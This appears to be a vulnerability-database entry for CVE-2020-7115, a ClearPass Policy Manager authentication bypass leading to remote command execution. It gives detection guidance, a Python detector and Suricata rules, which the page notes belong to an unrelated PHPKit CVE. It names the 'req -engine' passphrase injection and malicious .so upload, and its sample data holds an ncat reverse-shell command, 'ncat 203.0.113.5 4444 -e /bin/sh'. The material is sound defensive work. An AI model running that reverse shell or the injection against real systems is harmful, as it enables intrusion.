CVE-2020-7115
Published 2020-06-03
Priority: P185 · critical · CVSS 3.1 base score 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Exploit: available (see references)
EPSS: 64.60% (99.1th percentile)
The ClearPass Policy Manager web interface is affected by a vulnerability that leads to authentication bypass. Upon successful bypass an attacker could then execute an exploit that would allow remote command execution in the underlying operating system. Resolution: Fixed in 6.7.13-HF, 6.8.5-HF, 6.8.6, 6.9.1 and higher.
Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arubanetworks | clearpass_policy_manager | — | — |
| arubanetworks | clearpass_policy_manager | 6.7.0 – 6.7.13 | — |
| arubanetworks | clearpass_policy_manager | >= 6.8.0 < 6.8.6 | 6.8.6 |
| arubanetworks | clearpass_policy_manager | >= 6.9.0 < 6.9.1 | 6.9.1 |
Detection & IOCs (extracted from sources)
- Monitor for HTTP POST requests to the endpoint /tips/tipsSimulationUpload.action, especially those containing a 'clientPassphrase' field whose value is 'req -engine' followed by a path; this is the authentication bypass and engine injection trigger.
- Alert on uploads of .so (shared object) files to the ClearPass web interface, particularly to the tipsSimulationUpload.action endpoint, as the exploit delivers a malicious OpenSSL engine as a .so file.
- Detect creation or presence of files matching the pattern /tmp/clientCertFile*.txt on ClearPass hosts, as the exploit drops the malicious engine payload to this path.
- Detect outbound ncat/netcat connections spawned from the ClearPass process with the '-e /bin/sh' flag, indicating a reverse shell established post-exploitation.
- The exploit targets unauthenticated access to the ClearPass web interface: alert on any unauthenticated POST to /tips/tipsSimulationUpload.action, as this endpoint should require authentication.
- The exploit specifically requires the malicious OpenSSL engine (.so) to be compiled on RHEL/CentOS 7.x for compatibility with the target ClearPass environment; detections for the .so upload may need to account for this platform-specific artifact.
- Affected versions span multiple branches: ClearPass 6.7.x prior to 6.7.13-HF, 6.8.x prior to 6.8.5-HF, and 6.9.x prior to 6.9.1. Detection rules should not be scoped to only 6.7.0.
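As an added example (not code from the page's sources or from Aruba), the following Python applies the detection guidance above to constructed web-request and host-telemetry records; the record shapes, field names and detection labels are assumptions about what a WAF or EDR export would look like.

```python
import re
from fnmatch import fnmatch

SIM_UPLOAD = "/tips/tipsSimulationUpload.action"
# 'req -engine <path>' in clientPassphrase is the bypass / engine-load trigger
ENGINE_RE = re.compile(r"^\s*req\s+-engine\s+\S+")
SHELL_RE = re.compile(r"\b(ncat|netcat|nc)\b.*\s-e\s+/bin/sh\b")

def inspect_request(req):
    # Assumed record shape: method, path, authenticated, fields, upload_name
    hits = []
    if req.get("method", "").upper() != "POST" or req.get("path") != SIM_UPLOAD:
        return hits
    if not req.get("authenticated", False):
        hits.append("unauth-post-tipsSimulationUpload")
    passphrase = str(req.get("fields", {}).get("clientPassphrase", ""))
    if ENGINE_RE.search(passphrase):
        hits.append("clientPassphrase-engine-injection")
    if str(req.get("upload_name", "")).lower().endswith(".so"):
        hits.append("shared-object-upload")
    return hits

def inspect_host_event(event):
    # Assumed record shape: kind 'file' with path, or kind 'process' with cmdline
    hits = []
    if event.get("kind") == "file" and fnmatch(event.get("path", ""), "/tmp/clientCertFile*.txt"):
        hits.append("dropped-engine-payload-tmp")
    if event.get("kind") == "process" and SHELL_RE.search(event.get("cmdline", "")):
        hits.append("reverse-shell-ncat")
    return hits

# Constructed sample telemetry, not real captures.
SAMPLE_REQUESTS = [
    {"id": 1, "method": "POST", "path": SIM_UPLOAD, "authenticated": False,
     "fields": {"clientPassphrase": "req -engine /tmp/clientCertFile1.txt"},
     "upload_name": "engine.so"},
    {"id": 2, "method": "POST", "path": SIM_UPLOAD, "authenticated": True,
     "fields": {"clientPassphrase": "secret"}, "upload_name": "client.pem"},
    {"id": 3, "method": "GET", "path": "/tips/other.action", "authenticated": True},
]
SAMPLE_HOST_EVENTS = [
    {"kind": "file", "path": "/tmp/clientCertFile42.txt"},
    {"kind": "process", "cmdline": "ncat 203.0.113.5 4444 -e /bin/sh"},
    {"kind": "process", "cmdline": "nc -z localhost 443"},
]

def triage():
    # Map each sample record to its detections, dropping records with none
    out = {f"req-{r['id']}": inspect_request(r) for r in SAMPLE_REQUESTS}
    out.update({f"host-{i}": inspect_host_event(e) for i, e in enumerate(SAMPLE_HOST_EVENTS)})
    return {k: v for k, v in out.items() if v}
```

Only the first request and the first two host events fire; the authenticated upload of a .pem with an ordinary passphrase and the plain port check do not.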
CVSS provenance
- NVD v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD v2.0: 10.0 CRITICAL, AV:N/AC:L/Au:N/C:C/I:C/A:C
Suricata rules
Note: the rules listed below reference CVE-2006-7115 (PHPKit SQL injection), not CVE-2020-7115; they do not detect the ClearPass issue described above.

ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UNION SELECT
suricata · 2010-07-30 · CVSS 7.5 · CVE-2006-7115 [HIGH]
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UNION SELECT"; flow:established,to_server; http.uri; content:"/include.php?"; nocase; content:"catid="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2006-7115; reference:url,www.securityfocus.com/bid/21002; classtype:web-application-attack; sid:2004696; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid DELETE
suricata · 2010-07-30 · CVSS 7.5 · CVE-2006-7115 [HIGH]
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid DELETE"; flow:established,to_server; http.uri; content:"/include.php?"; nocase; content:"catid="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2006-7115; reference:url,www.securityfocus.com/bid/21002; classtype:web-application-attack; sid:2004698; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T11
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid INSERT
suricata · 2010-07-30 · CVSS 7.5 · CVE-2006-7115 [HIGH]
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid INSERT"; flow:established,to_server; http.uri; content:"/include.php?"; nocase; content:"catid="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2006-7115; reference:url,www.securityfocus.com/bid/21002; classtype:web-application-attack; sid:2004697; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T11
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UPDATE
suricata · 2010-07-30 · CVSS 7.5 · CVE-2006-7115 [HIGH]
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UPDATE"; flow:established,to_server; http.uri; content:"/include.php?"; nocase; content:"catid="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2006-7115; reference:url,www.securityfocus.com/bid/21002; classtype:web-application-attack; sid:2004700; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T119
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid ASCII
suricata · 2010-07-30 · CVSS 7.5 · CVE-2006-7115 [HIGH]
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid ASCII"; flow:established,to_server; http.uri; content:"/include.php?"; nocase; content:"catid="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2006-7115; reference:url,www.securityfocus.com/bid/21002; classtype:web-application-attack; sid:2004699; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T11
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid SELECT
suricata · 2010-07-30 · CVSS 7.5 · CVE-2006-7115 [HIGH]
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid SELECT"; flow:established,to_server; http.uri; content:"/include.php?"; nocase; content:"catid="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2006-7115; reference:url,www.securityfocus.com/bid/21002; classtype:web-application-attack; sid:2004695; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T11
References
- http://packetstormsecurity.com/files/158368/ClearPass-Policy-Manager-Unauthenticated-Remote-Command-Execution.html
- https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-005.txt